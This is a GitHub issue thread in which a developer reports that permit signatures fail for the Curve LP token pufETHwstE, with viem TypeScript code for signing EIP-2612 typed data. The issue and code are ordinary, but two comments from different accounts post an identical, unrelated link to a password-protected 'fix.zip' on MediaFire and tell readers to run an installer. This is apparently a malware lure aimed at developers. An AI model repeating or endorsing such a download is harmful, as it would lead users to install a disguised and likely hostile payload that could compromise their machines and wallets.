### ISSUE TITLE
Permit signature not working for Curve LP token pufETHwstE

### ISSUE THREAD

**Issue by 9inpachi** [curvefi/stableswap-ng#54]
Hi.

## Description

I am trying to generate a permit signature for a [Curve LP token](https://etherscan.io/token/0xeeda34a377dd0ca676b9511ee1324974fa8d980d) but the permit I get is not correct and one of our contracts that uses a permit to check if a token is approved reverts transactions.

## Example

I have a complete reproducable example which uses two ERC20 tokens namely `pufETH` and `pufETHwstE`. Using the exact same code, the permit signature works for `pufETH` but doesn't work for `pufETHwstE`. Here's the link to the codesandbox: https://codesandbox.io/p/sandbox/curve-lp-permit-signature-rkth43. Please check `config.ts` for more information on how to test the example.

The example uses the following code for generating the permit signature using viem.

```ts
import { Address, getContract, parseSignature } from "viem";
import { chain, publicClient, selectedToken, walletClient } from "./config";
import { ERC20Permit } from "./contracts/erc20-permit";

export type PermitSignature = {
  r: Address;
  s: Address;
  v?: bigint;
  yParity: number;
  deadline: bigint;
};

export const getPermitSignature = async (
  ownerAddress: Address,
  spenderAddress: Address,
  value: bigint
): Promise<PermitSignature> => {
  const contract = getContract({
    address: selectedToken.chainAddresses[chain.id],
    abi: ERC20Permit,
    client: {
      public: publicClient,
      wallet: walletClient,
    },
  });

  const permitNonces = await contract.read.nonces([ownerAddress]);
  const name = await contract.read.name();
  const domain = <const>{
    name,
    version: selectedToken.permitVersion,
    chainId: chain.id,
    verifyingContract: selectedToken.chainAddresses[chain.id],
  };
  const types = <const>{
    Permit: [
      { name: "owner", type: "address" },
      { name: "spender", type: "address" },
      { name: "value", type: "uint256" },
      { name: "nonce", type: "uint256" },
      { name: "deadline", type: "uint256" },
    ],
  };
  const deadline = BigInt(2 ** 256) - 1n;

  const signature = await walletClient.signTypedData({
    account: ownerAddress,
    domain,
    types,
    primaryType: "Permit",
    message: {
      owner: ownerAddress,
      spender: spenderAddress,
      value,
      nonce: permitNonces,
      deadline,
    },
  });

  return { ...parseSignature(signature), deadline };
};

```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
